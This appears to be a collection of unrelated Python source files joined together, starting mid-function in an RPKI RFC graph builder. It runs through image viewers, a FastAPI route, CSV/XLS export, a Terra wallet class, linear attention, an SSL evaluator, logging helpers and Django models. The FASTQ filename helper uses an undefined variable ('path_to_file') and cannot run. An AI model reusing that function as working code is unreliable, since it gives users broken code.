if 'STANDARD' in caterogy_id:
caterogy_id = "STANDARD"
elif 'BEST' in caterogy_id:
caterogy_id = "BCP"
else:
caterogy_id = caterogy_id
if caterogy_id not in categories.keys():
categories[caterogy_id] = [k]
else:
categories[caterogy_id].append(k)
rfcs_map['RFC'+str(k)] = "RFCS." + str(caterogy_id) + "." + 'RFC'+str(k)
return categories, rfcs_map
def add_param_to_graph(self, elements, rfc_list, extended_rfcs, rfcs_groups, summaries):
from_set = set()
to_set = set()
for elm in elements:
from_set.add(elm['from'])
to_set.add(elm['to'])
for elm in elements:
tmp = elm['from'].split(".")[-1].strip('RFC')
rfc_content = None
if tmp in summaries.keys():
rfc_content = "".join(summaries[tmp])
if 'color' not in elm.keys():
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
elm['color'] = '#ffc107'
elm['summary'] = rfc_content
else:
elm['color'] = 'blue'
elm['summary'] = rfc_content
else:
elm['color'] = 'grey'
elm['summary'] = rfc_content
for elm in extended_rfcs:
tmp = elm.split(".")[-1].strip('RFC')
rfc_content = None
if tmp in summaries.keys():
rfc_content = "".join(summaries[tmp])
if elm in to_set:
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
color = '#ffc107'
else:
color = "blue"
else:
color = "grey"
elm_data = {
'from': elm,
'to': None,
'kind': None,
'color': color,
'summary': rfc_content,
'group': rfcs_groups[elm.split(".")[-1]]
}
if elm not in from_set:
if int(tmp) in rfc_list:
if str(tmp) in summaries.keys():
color = '#ffc107'
else:
color = "blue"
else:
color = "grey"
elm_data = {
'from': elm,
'to': None,
'kind': None,
'color': color,
'summary': rfc_content,
'group': rfcs_groups[elm.split(".")[-1]]
}
if elm_data not in elements:
elements.append(elm_data)
return elements
def add_tooltip_to_graph(self, data, elements):
for rfc, record in data.items():
if record != 'Not Issued':
status = record['status']
issue_data = record['issue_data']
title = record['title']
authors = record['authors']
title_formated = ""
title_list = title.split()
limit = int(len(title_list)/2)
if len(title_list) > 10:
title_formated += " ".join(title_list[:limit])
title_formated += "</br>"
title_formated += " ".join(title_list[limit:])
else:
title_formated = title
if int(rfc) == 4271:
status = "PROPOSED STANDARD"
rfc_title = "<div>"
rfc_title += "<strong>RFC</strong>:" + rfc+ "</br>"
rfc_title += "<strong>Title</strong>:" + str(title_formated) + "</br>"
rfc_title += "<strong>Category</strong>:" + status + "</br>"
rfc_title += "<strong>Authors</strong>:"
rfc_title += "<ul>"
for auth in authors:
rfc_title += "<li>" + auth + "</li>"
rfc_title += "</ul>"
rfc_title += "<strong>Issue Date</strong>:" + issue_data['month']+" " + issue_data['year'] + "</br>"
rfc_title += "<strong>Url</strong>: https://tools.ietf.org/html/rfc" + str(rfc)
rfc_title += "</div>"
for elm in elements:
tmp = elm['from'].split(".")[-1].strip('RFC')
if int(tmp) == int(rfc):
elm['title'] = rfc_title
return elements
def format_d3js_data(self, data, rfc_list, summaries, groups):
categories, rfcs_map = self.rfcs_name_category(data)
rfcs_groups = {y:k for k,v in groups.items() for y in v}
elements = []
extended_rfcs = []
for _,rfcs in categories.items():
rfcs_filtered = [x for x in rfcs if int(x) in rfc_list ]
named_rfcs_filtered = ['RFC'+str(x) for x in rfcs_filtered ]
for rfc in rfcs_filtered:
record = data[rfc]
if 'obsolets' in record:
for ed in record['obsolets']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map['RFC'+str(rfc)],
'to': rfcs_map[ed],
'kind': 'OBSOLETE',
'group': rfcs_groups['RFC'+str(rfc)]
}
if current_relation not in elements:
elements.append(current_relation)
if 'obsoleted_by' in record:
for ed in record['obsoleted_by']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map[ed],
'to': rfcs_map['RFC'+str(rfc)],
'kind': 'OBSOLETE',
'group': rfcs_groups[ed]
}
if current_relation not in elements:
elements.append(current_relation)
if 'updates' in record:
for ed in record['updates']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map['RFC'+str(rfc)],
'to': rfcs_map[ed],
'kind': 'UPDATE',
'group': rfcs_groups['RFC'+str(rfc)]
}
if current_relation not in elements:
elements.append(current_relation)
if 'updated_by' in record:
for ed in record['updated_by']:
if ed not in named_rfcs_filtered:
named_rfcs_filtered.append(ed)
if rfc not in named_rfcs_filtered:
named_rfcs_filtered.append('RFC'+str(rfc))
current_relation = {
'from': rfcs_map[ed],
'to': rfcs_map['RFC'+str(rfc)],
'kind': 'UPDATE',
'group': rfcs_groups[ed]
}
if current_relation not in elements:
elements.append(current_relation)
extended_rfcs.extend(named_rfcs_filtered)
extended_rfcs = [rfcs_map[x] for x in set(extended_rfcs)]
# Add color and information about new RFCs => founded following update/obsolete relationship
elements = self.add_param_to_graph(elements, rfc_list, extended_rfcs, rfcs_groups, summaries)
# Add title data (tooltip)
elements = self.add_tooltip_to_graph(data, elements)
# for k in elements:
# print(k['from'], k['color'], k['group'])
return elements
def create(self):
try:
# Get RPKI RFCs list
print("#"*5 + "= Getting RPKI RFCs list =" + "#"*5)
self.rpki_rfcs = self.get_rpki_rfcs(self.rpki_rfcs_file)
# Get all RFCs from the index file
print("#"*5 + "= Downloading RFCs Index file =" + "#"*5)
rfcs_index_file = self.get_rfcs_index(self.rfcs_index_file)
print("#"*5 + "= Creatin RPKI RFCs summaries =" + "#"*5)
# Create and format summaries by reading Markdown template
sum_info = RFCsSummaries(templates_path=self.summaries_folder, result_file=self.summaries_filename)
self.summaries = sum_info.get()
print("#"*5 + "= Getting RPKI RFCs groups =" + "#"*5)
# read RFC groups (MUST, MAY and SHOULD)
grp_info = RFCsGroups(groups_file=self.groups_file)
self.groups = grp_info.get()
print("#"*5 + "= Formating RFCs data =" + "#"*5)
if rfcs_index_file:
self.rfcs_json_obj = self.rfcs_json_data()
if self.rpki_rfcs and self.rfcs_json_obj and self.summaries and self.groups:
self.d3js_data = self.format_d3js_data(self.rfcs_json_obj, self.rpki_rfcs, self.summaries, self.groups)
if self.save_graph_data(self.d3js_data):
print("#"*5 + "= RPKI RFCs Graph saved in file " + str(self.graph_file) +" =" + "#"*5)
except Exception as err:
return err
return True
def save_graph_data(self, elements):
try:
with open(self.graph_file, 'w') as outfile:
json.dump(elements, outfile)
except:
return False
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build RPKI RFCs graph data.')
parser.add_argument('-r', '--rfcs', help='RPKI RFCs list (one RFC per line)', required=True)
args = vars(parser.parse_args())
rpki_rfcs_file_path = args['rfcs']
graph = RFCsGraph(rpki_rfcs_file_path,
rfcs_index_file="./data/rfc-index.txt",
templates_path="./summaries",
summaries_result_file="./data/rfcs_summaries.json",
groups_file="./data/rfcs_groups.json",
graph_file="./html/data/rfcs_data.json")
graph.create()
|
from . circuit_element_group import CircuitElementGroup
from . bus import Bus
class BusGroup(CircuitElementGroup):
dss_module_name = 'Bus'
ele_class = Bus
def _collect_names(self, dss):
""" Override super() to use dss.Circuit.AllBusNames()"""
self._names = dss.Circuit.AllBusNames()
self._populate_name_idx_dicts()
|
from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin
def median_filter(image, radius):
return median(image, selem=disk(radius))
image = data.coins()
viewer = ImageViewer(image)
plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()
viewer += plugin
viewer.show()
|
import numpy as np
import cv2
img=cv2.imread('c:\\users\\lenovo\\desktop\\bjork.jpg',0)
cv2.imshow('Bjork',img)
k=cv2.waitKey(0)
if k==27:
cv2.destroyAllWindows()
elif k==ord('s'):
cv2.imwrite('deepgray.jpg', img)
cv2.destroyAllWindows()
|
from fastapi import APIRouter, Depends
from core.dependencies import init_service
from models.quiz import QuizInResponsePartial
from services.quiz import QuizService
router = APIRouter()
@router.get('/{post_id}', response_model=QuizInResponsePartial)
async def get_quiz_by_post_id(post_id: int, service: QuizService = Depends(init_service(QuizService))):
quiz = await service.get_by_post_id(post_id)
return quiz
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Common library to export either CSV or XLS.
"""
import gc
import logging
import numbers
import openpyxl
import re
import six
import StringIO
import tablib
from django.http import StreamingHttpResponse, HttpResponse
from django.utils.encoding import smart_str
from desktop.lib import i18n
LOG = logging.getLogger(__name__)
ILLEGAL_CHARS = r'[\000-\010]|[\013-\014]|[\016-\037]'
def nullify(cell):
return cell if cell is not None else "NULL"
def encode_row(row, encoding=None):
encoded_row = []
for cell in row:
if isinstance(cell, six.string_types):
cell = re.sub(ILLEGAL_CHARS, '?', cell)
cell = nullify(cell)
if not isinstance(cell, numbers.Number):
cell = smart_str(cell, encoding or i18n.get_site_encoding(), strings_only=True, errors='replace')
encoded_row.append(cell)
return encoded_row
def dataset(headers, data, encoding=None):
"""
dataset(headers, data) -> Dataset object
Return a dataset object for a csv or excel document.
"""
dataset = tablib.Dataset()
if headers:
dataset.headers = encode_row(headers, encoding)
for row in data:
dataset.append(encode_row(row, encoding))
return dataset
class XlsWrapper():
def __init__(self, xls):
self.xls = xls
def xls_dataset(workbook):
output = StringIO.StringIO()
workbook.save(output)
output.seek(0)
return XlsWrapper(output.read())
def create_generator(content_generator, format, encoding=None):
if format == 'csv':
show_headers = True
for headers, data in content_generator:
yield dataset(show_headers and headers or None, data, encoding).csv
show_headers = False
elif format == 'xls':
workbook = openpyxl.Workbook(write_only=True)
worksheet = workbook.create_sheet()
row_ctr = 0
for _headers, _data in content_generator:
# Write headers to workbook once
if _headers and row_ctr == 0:
worksheet.append(encode_row(_headers, encoding))
row_ctr += 1
# Write row data to workbook
for row in _data:
worksheet.append(encode_row(row, encoding))
row_ctr += 1
yield xls_dataset(workbook).xls
gc.collect()
else:
raise Exception("Unknown format: %s" % format)
def make_response(generator, format, name, encoding=None):
"""
@param data An iterator of rows, where every row is a list of strings
@param format Either "csv" or "xls"
@param name Base name for output file
@param encoding Unicode encoding for data
"""
if format == 'csv':
content_type = 'application/csv'
resp = StreamingHttpResponse(generator, content_type=content_type)
try:
del resp['Content-Length']
except KeyError:
pass
elif format == 'xls':
format = 'xlsx'
content_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
resp = HttpResponse(next(generator), content_type=content_type)
elif format == 'json':
content_type = 'application/json'
resp = HttpResponse(generator, content_type=content_type)
else:
raise Exception("Unknown format: %s" % format)
resp['Content-Disposition'] = 'attachment; filename="%s.%s"' % (name, format)
return resp
|
# ----------------------------------------------------------------
# YDK - YANG Development Kit
# Copyright 2016-2019 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
# This file has been modified by Yan Gorelik, YDK Solutions.
# All modifications in original under CiscoDevNet domain
# introduced since October 2019 are copyrighted.
# All rights reserved under Apache License, Version 2.0.
# ------------------------------------------------------------------
"""
class_meta_printer.py
YANG model driven API, class emitter.
"""
from ydkgen.api_model import Class, Enum, Property
from ydkgen.common import sort_classes_at_same_level, get_module_name, is_config_stmt
from ydkgen.printer.meta_data_util import get_meta_info_data
from .enum_printer import EnumPrinter
class ClassMetaPrinter(object):
def __init__(self, ctx, one_class_per_module, identity_subclasses=None):
self.ctx = ctx
self.is_rpc = False
self.one_class_per_module = one_class_per_module
self.identity_subclasses = identity_subclasses
def print_output(self, unsorted_classes):
''' This arranges the classes at the same level
so that super references are printed before
the subclassess'''
sorted_classes = sort_classes_at_same_level(unsorted_classes)
for clazz in sorted_classes:
self.print_class_meta(clazz)
def print_parents(self, unsorted_classes):
''' This arranges the classes at the same level
so that super references are printed before
the subclassess'''
sorted_classes = sort_classes_at_same_level(unsorted_classes)
for clazz in sorted_classes:
self._print_meta_parents(clazz)
def _print_meta_parents(self, clazz):
nested_classes = sort_classes_at_same_level(
[nested_class for nested_class in clazz.owned_elements if isinstance(nested_class, Class)])
self.print_parents(nested_classes)
for nested_class in nested_classes:
self.ctx.writeln('_meta_table[\'%s\'][\'meta_info\'].parent =_meta_table[\'%s\'][\'meta_info\']' % (
nested_class.qn(), clazz.qn()))
def print_class_meta(self, clazz):
if clazz.is_rpc():
self.is_rpc = True
self.print_output(
[nested_class for nested_class in clazz.owned_elements if isinstance(nested_class, Class)])
enumz = []
enumz.extend([nested_enum for nested_enum in clazz.owned_elements if isinstance(
nested_enum, Enum)])
for nested_enumz in sorted(enumz, key=lambda e: e.name):
EnumPrinter(self.ctx).print_enum_meta(nested_enumz)
self._print_meta_member(clazz)
def _print_meta_member(self, clazz):
mtype = 'REFERENCE_CLASS'
if clazz.stmt.keyword == 'list':
mtype = 'REFERENCE_LIST'
elif clazz.stmt.keyword == 'leaf-list':
mtype = 'REFERENCE_LEAFLIST'
elif clazz.stmt.keyword == 'identity':
mtype = 'REFERENCE_IDENTITY_CLASS'
self.ctx.writeln('\'%s\': {' % (clazz.qn()))
self.ctx.lvl_inc()
self.ctx.writeln("'meta_info': _MetaInfoClass(")
self.ctx.lvl_inc()
self.ctx.writeln("'%s', %s," % (clazz.qn(), mtype))
description = " "
for st in clazz.stmt.substmts:
if st.keyword == 'description':
description = st.arg
break
self.ctx.writeln('"""%s""",' % description)
if clazz.is_grouping():
self.ctx.writeln('True, ')
else:
self.ctx.writeln('False, ')
self.ctx.writeln('[')
if self.is_rpc:
prop_list = [p for p in clazz.owned_elements if isinstance(p, Property)]
else:
prop_list = clazz.properties()
for prop in prop_list:
meta_info_data = get_meta_info_data(
prop, prop.property_type, prop.stmt.search_one('type'), 'py',
self.identity_subclasses)
self.print_meta_class_member(meta_info_data, self.ctx)
self.ctx.writeln('],')
module_name = "%s" % get_module_name(clazz.stmt)
self.ctx.writeln("'%s'," % module_name)
self.ctx.writeln("'%s'," % clazz.stmt.arg)
if clazz.is_grouping():
self.ctx.writeln('None,')
else:
self.ctx.writeln("_yang_ns.NAMESPACE_LOOKUP['%s']," % module_name)
self.ctx.writeln("'%s'," % clazz.get_py_mod_name())
if mtype == 'REFERENCE_CLASS' or mtype == 'REFERENCE_LIST':
if not is_config_stmt(clazz.stmt):
self.ctx.writeln("is_config=False,")
if clazz.stmt.search_one('presence'):
self.ctx.writeln("is_presence=True,")
if clazz.stmt.search_one('mandatory'):
self.ctx.writeln("has_mandatory=True,")
if clazz.stmt.search_one('when'):
self.ctx.writeln("has_when=True,")
if clazz.stmt.search_one('must'):
self.ctx.writeln("has_must=True,")
self.ctx.lvl_dec()
self.ctx.writeln('),')
self.ctx.lvl_dec()
self.ctx.writeln('},')
def print_meta_class_member(self, meta_info_data, ctx):
if meta_info_data is None:
return
name = meta_info_data.name
mtype = meta_info_data.mtype
ptype = meta_info_data.ptype
ytype = meta_info_data.ytype
pmodule_name = meta_info_data.pmodule_name
clazz_name = meta_info_data.clazz_name
prange = meta_info_data.prange
pattern = meta_info_data.pattern
presentation_name = meta_info_data.presentation_name
max_elements = meta_info_data.max_elements
min_elements = meta_info_data.min_elements
default_value_object = meta_info_data.default_value_object
ctx.writeln(" _MetaInfoClassMember(")
ctx.lvl_inc()
ctx.writeln("'%s', %s, '%s', '%s'," % (name, mtype, ptype, ytype))
ctx.writeln("%s, %s," % (pmodule_name, clazz_name))
ctx.writeln("%s, %s," % (str(prange), str(pattern)))
ctx.writeln('"""')
if meta_info_data.comment is not None:
for line in meta_info_data.comment.split('\n'):
ctx.writeln('%s' % line)
ctx.writeln('""",')
ctx.writeln("'%s'," % presentation_name)
if len(meta_info_data.children) > 0:
ctx.writeln(
"'%s', %s, [" % (meta_info_data.module_name, meta_info_data.is_key))
ctx.lvl_inc()
for child_meta_info_data in meta_info_data.children:
self.print_meta_class_member(child_meta_info_data, ctx)
ctx.lvl_dec()
ctx.write(']')
else:
ctx.write("'%s', %s" %
(meta_info_data.module_name, meta_info_data.is_key))
if max_elements:
ctx.str(", max_elements=%s" % max_elements)
if min_elements:
ctx.str(", min_elements=%s" % min_elements)
if default_value_object:
ctx.str(", default_value=%s" % default_value_object)
if not meta_info_data.is_config:
ctx.str(", is_config=False")
if meta_info_data.is_presence:
ctx.str(", is_presence=True")
if meta_info_data.mandatory:
ctx.str(", is_mandatory=True")
if meta_info_data.has_when:
ctx.str(", has_when=True")
if meta_info_data.has_must:
ctx.str(", has_must=True")
ctx.str('),\n')
ctx.lvl_dec()
|
from __future__ import annotations
from contextlib import contextmanager
from typing import List, Optional, Union
import jigu.client.terra
from jigu.client.object_query import AccountQuery
from jigu.core import StdFee, StdMsg, StdSignMsg, StdTx
from jigu.key import Key
__all__ = ["Wallet"]
class Wallet(AccountQuery):
"""A Wallet is an augmented AccountQuery, and provides `chain_id`, `account_number`,
and `sequence` information for signing transactions, which is performed by a Key."""
def __init__(self, terra: jigu.client.terra.Terra, key: Key):
AccountQuery.__init__(self, terra, key.acc_address)
self.key = key
self.terra = terra
self._account_number = 0
self._manual_sequence = False
self._sequence = None
def __repr__(self) -> str:
return f"Wallet<{self.address}> -> {self.terra}"
@property
def account_number(self) -> int:
"""Account number is fetched for the first time it is found, then saved."""
if self._account_number == 0:
self._account_number = self.info().account_number
return self._account_number
@property
def sequence(self) -> int:
"""Property that dynamically fetches sequence number everytime it is called."""
return self.info().sequence
def create_tx(
self, *msgs: StdMsg, fee: Optional[StdFee] = None, memo: str = "",
) -> StdSignMsg:
"""Creates a sign message (`StdSignMsg`), which contains the necessary info to
sign the transaction. Helpful to think of it as "create unsigned tx".
"""
if not fee:
# estimate our fee if fee not supplied
tx = StdTx(msg=msgs, memo=memo)
fee = self.terra.tx.estimate_fee(tx)
if self._manual_sequence:
sequence = self._sequence
self._sequence += 1
else:
sequence = self.sequence
return StdSignMsg(
chain_id=self.terra.chain_id,
account_number=self.account_number,
sequence=sequence,
fee=fee,
msgs=msgs,
memo=memo,
)
def sign_tx(self, *args, **kwargs):
"""Uses the Wallet's key to sign the transaction."""
return self.key.sign_tx(*args, **kwargs)
def create_and_sign_tx(
self, *msgs: StdMsg, fee: Optional[StdFee] = None, memo: str = "",
) -> StdTx:
"""Creates a sign message, signs it, and produces a transaction in one go.
Outputs a ready-to-broadcast `StdTx`.
"""
return self.sign_tx(self.create_tx(*msgs, fee=fee, memo=memo))
@contextmanager
def manual(self) -> Wallet:
"""Manual mode is a context that creates sign messages (and transactions) with the
sequence number incremented on each TX generation rather than polling from the
blockchain every time, so they can be saved and broadcasted at a later time.
"""
self._sequence = self.sequence
self._manual_sequence = True
yield self
self._manual_sequence = False
def broadcast(self, *args, **kwargs):
return self.terra.tx.broadcast(*args, **kwargs)
|
"""Implement unmasked linear attention."""
import torch
from torch.nn import Module
from ..attention_registry import AttentionRegistry, Optional, Callable, Int, \
EventDispatcherInstance
from ..events import EventDispatcher
from ..feature_maps import elu_feature_map
class LinearAttention(Module):
"""Implement unmasked attention using dot product of feature maps in
O(N D^2) complexity.
Given the queries, keys and values as Q, K, V instead of computing
V' = softmax(Q.mm(K.t()), dim=-1).mm(V),
we make use of a feature map function Φ(.) and perform the following
computation
V' = normalize(Φ(Q).mm(Φ(K).t())).mm(V).
The above can be computed in O(N D^2) complexity where D is the
dimensionality of Q, K and V and N is the sequence length. Depending on the
feature map, however, the complexity of the attention might be limited.
Arguments
---------
feature_map: callable, a callable that applies the feature map to the
last dimension of a tensor (default: elu(x)+1)
eps: float, a small number to ensure the numerical stability of the
denominator (default: 1e-6)
event_dispatcher: str or EventDispatcher instance to be used by this
module for dispatching events (default: the default
global dispatcher)
"""
def __init__(self, query_dimensions, feature_map=None, eps=1e-6,
event_dispatcher=""):
super(LinearAttention, self).__init__()
self.feature_map = (
feature_map(query_dimensions) if feature_map else
elu_feature_map(query_dimensions)
)
self.eps = eps
self.event_dispatcher = EventDispatcher.get(event_dispatcher)
def forward(self, queries, keys, values, attn_mask, query_lengths,
key_lengths):
# Apply the feature map to the queries and keys
self.feature_map.new_feature_map(queries.device)
Q = self.feature_map.forward_queries(queries)
K = self.feature_map.forward_keys(keys)
# Apply the key padding mask and make sure that the attn_mask is
# all_ones
if not attn_mask.all_ones:
raise RuntimeError(("LinearAttention does not support arbitrary "
"attention masks"))
K = K * key_lengths.float_matrix[:, :, None, None]
# Compute the KV matrix, namely the dot product of keys and values so
# that we never explicitly compute the attention matrix and thus
# decrease the complexity
KV = torch.einsum("nshd,nshm->nhmd", K, values)
# Compute the normalizer
Z = 1/(torch.einsum("nlhd,nhd->nlh", Q, K.sum(dim=1))+self.eps)
# Finally compute and return the new values
V = torch.einsum("nlhd,nhmd,nlh->nlhm", Q, KV, Z)
return V.contiguous()
# Register the attention implementation so that it becomes available in our
# builders
AttentionRegistry.register(
"linear", LinearAttention,
[
("query_dimensions", Int),
("feature_map", Optional(Callable)),
("event_dispatcher", Optional(EventDispatcherInstance, ""))
]
)
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import pytorch_lightning as pl
import torch
from pl_bolts.callbacks.ssl_online import SSLOnlineEvaluator
from pl_bolts.models.self_supervised.evaluator import SSLEvaluator
from pytorch_lightning.metrics import Metric
from torch import Tensor as T
from torch.nn import functional as F
from InnerEye.ML.SSL.utils import SSLDataModuleType
from InnerEye.ML.lightning_metrics import Accuracy05, AreaUnderPrecisionRecallCurve, AreaUnderRocCurve
BatchType = Union[Dict[SSLDataModuleType, Any], Any]
class SSLOnlineEvaluatorInnerEye(SSLOnlineEvaluator):
def __init__(self,
learning_rate: float,
class_weights: Optional[torch.Tensor] = None,
**kwargs: Any) -> None:
"""
Creates a hook to evaluate a linear model on top of an SSL embedding.
:param class_weights: The class weights to use when computing the cross entropy loss. If set to None,
no weighting will be done.
:param length_linear_head_loader: The maximum number of batches in the dataloader for the linear head.
"""
super().__init__(**kwargs)
self.weight_decay = 1e-4
self.learning_rate = learning_rate
self.train_metrics: List[Metric] = [AreaUnderRocCurve(), AreaUnderPrecisionRecallCurve(),
Accuracy05()] \
if self.num_classes == 2 else [Accuracy05()]
self.val_metrics: List[Metric] = [AreaUnderRocCurve(), AreaUnderPrecisionRecallCurve(),
Accuracy05()] \
if self.num_classes == 2 else [Accuracy05()]
self.class_weights = class_weights
def on_pretrain_routine_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""
Initializes modules and moves metrics and class weights to module device
"""
for metric in [*self.train_metrics, *self.val_metrics]:
metric.to(device=pl_module.device) # type: ignore
pl_module.non_linear_evaluator = SSLEvaluator(n_input=self.z_dim,
n_classes=self.num_classes,
p=self.drop_p,
n_hidden=self.hidden_dim).to(pl_module.device)
assert isinstance(pl_module.non_linear_evaluator, torch.nn.Module)
self.optimizer = torch.optim.Adam(pl_module.non_linear_evaluator.parameters(),
lr=self.learning_rate,
weight_decay=self.weight_decay)
@staticmethod
def to_device(batch: Any, device: Union[str, torch.device]) -> Tuple[T, T]:
"""
Moves batch to device.
:param device: device to move the batch to.
"""
_, x, y = batch
return x.to(device), y.to(device)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
self.visited_ids: Set[Any] = set()
def on_validation_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
self.visited_ids = set()
def shared_step(self, batch: BatchType, pl_module: pl.LightningModule, is_training: bool) -> T:
"""
Forward pass and MLP loss computation for the linear head only. Representations from the encoder are frozen and
detach from computation graph for this loss computation.
Returns cross-entropy loss for the input batch.
"""
batch = batch[SSLDataModuleType.LINEAR_HEAD] if isinstance(batch, dict) else batch
x, y = self.to_device(batch, pl_module.device)
with torch.no_grad():
representations = self.get_representations(pl_module, x)
representations = representations.detach()
assert isinstance(pl_module.non_linear_evaluator, torch.nn.Module)
# Run the linear-head with SSL embeddings.
mlp_preds = pl_module.non_linear_evaluator(representations)
weights = None if self.class_weights is None else self.class_weights.to(device=pl_module.device)
mlp_loss = F.cross_entropy(mlp_preds, y, weight=weights)
with torch.no_grad():
posteriors = F.softmax(mlp_preds, dim=-1)
for metric in (self.train_metrics if is_training else self.val_metrics):
metric(posteriors, y) # type: ignore
return mlp_loss
def on_validation_batch_end(self, trainer: pl.Trainer,
pl_module: pl.LightningModule,
outputs: Any,
batch: BatchType,
batch_idx: int,
dataloader_idx: int) -> None: # type: ignore
"""
Get and log validation metrics.
"""
ids_linear_head = tuple(batch[SSLDataModuleType.LINEAR_HEAD][0].tolist())
if ids_linear_head not in self.visited_ids:
self.visited_ids.add(ids_linear_head)
loss = self.shared_step(batch, pl_module, is_training=False)
pl_module.log('ssl_online_evaluator/val/loss', loss, on_step=False, on_epoch=True, sync_dist=False)
for metric in self.val_metrics:
pl_module.log(f"ssl_online_evaluator/val/{metric.name}", metric, on_epoch=True,
on_step=False) # type: ignore
def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx) -> None: # type: ignore
"""
Get and log training metrics, perform network update.
"""
ids_linear_head = tuple(batch[SSLDataModuleType.LINEAR_HEAD][0].tolist())
if ids_linear_head not in self.visited_ids:
self.visited_ids.add(ids_linear_head)
loss = self.shared_step(batch, pl_module, is_training=True)
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
# log metrics
pl_module.log('ssl_online_evaluator/train/loss', loss)
for metric in self.train_metrics:
pl_module.log(f"ssl_online_evaluator/train/online_{metric.name}", metric, on_epoch=True,
on_step=False) # type: ignore
|
#!/usr/bin/env python3
import os
def get_fastq_file_name(fastq_file):
if fastq_file.endswith(".fastq.gz"):
file_name = os.path.basename(path_to_file).split(".fastq.gz")[0]
return file_name
if fastq_file.endswith(".fq.gz"):
file_name = os.path.basename(path_to_file).split(".fq.gz")[0]
return file_name
if fastq_file.endswith(".fastq"):
file_name = os.path.basename(path_to_file).split(".fastq")[0]
return file_name
if fastq_file.endswith(".fq"):
file_name = os.path.basename(path_to_file).split(".fq")[0]
return file_name
|
from __future__ import print_function
import sys
DEBUG_LOG_ENABLED = True
# Debug Levels
DEBUG_LOG_ERROR = 0
DEBUG_LOG_WARN = 1
DEBUG_LOG_INFO = 2
DEBUG_LOG_VERBOSE = 3
# Only output messages upto the Info Level by default.
DEBUG_LOG_LEVEL = DEBUG_LOG_INFO
def debug_print(msg):
"""Print a info debug message."""
return debug_print_info(msg)
def debug_print_level(level, msg):
"""Log a debug message and print it out to standard output stream.
All logging should happen via this function or it's related neighbors so that it can easily be controlled
(e.g. disabled for submission).
level: One of DEBUG_LOG_{ERROR, WARN, INFO, VERBOSE} indicate level of the message to be logged
msg: message to log.
"""
if level < 0:
return
should_log = (level <= DEBUG_LOG_LEVEL and DEBUG_LOG_ENABLED)
if not should_log:
return
# Color the log level prefixes. See
# https://en.wikipedia.org/wiki/ANSI_escape_code#Colors for ANSI color
# codes.
if level == DEBUG_LOG_ERROR:
# Red color
print("\x1b[31m", end='')
print("[ERROR] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_WARN:
# Yellow color
print("\x1b[33m", end='')
print("[WARNING] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_INFO:
# Green color
print("\x1b[32m", end='')
print("[INFO] ", end='')
print("\x1b[0m", end='')
elif level == DEBUG_LOG_VERBOSE:
# Blue color
print("\x1b[34m", end='')
print("[VERBOSE] ", end='')
print("\x1b[0m", end='')
# Finally log the message
print(msg)
def debug_print_info(msg):
"""Print info debug message."""
return debug_print_level(DEBUG_LOG_INFO, msg)
def debug_print_error(msg):
"""Print error debug message."""
return debug_print_level(DEBUG_LOG_ERROR, msg)
def debug_print_warn(msg):
"""Print warning debug message."""
return debug_print_level(DEBUG_LOG_WARN, msg)
def debug_print_verbose(msg):
"""Print verbose debug message."""
return debug_print_level(DEBUG_LOG_VERBOSE, msg)
def stderr_print(msg):
"""Print a msg to stderr."""
print(msg, file=sys.stderr)
def stdout_print(msg):
"""Print msg as is without any extra new lines."""
print(msg, file=sys.stdout, end='')
|
from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
email = models.EmailField(blank=True)
def __str__(self):
return self.email
class Invalidmail(models.Model):
email = models.EmailField(blank=True)
def __str__(self):
return self.email
class Customer(models.Model):
user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True,blank=True)
objects = models.Manager
def __str__(self):
return self.name
class Email(models.Model):
my_customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL, related_name='mycust')
name = models.CharField(max_length=200, null=True)
upload_file = models.FileField(upload_to='CSV', null=True, blank=True)
def __str__(self):
return self.name
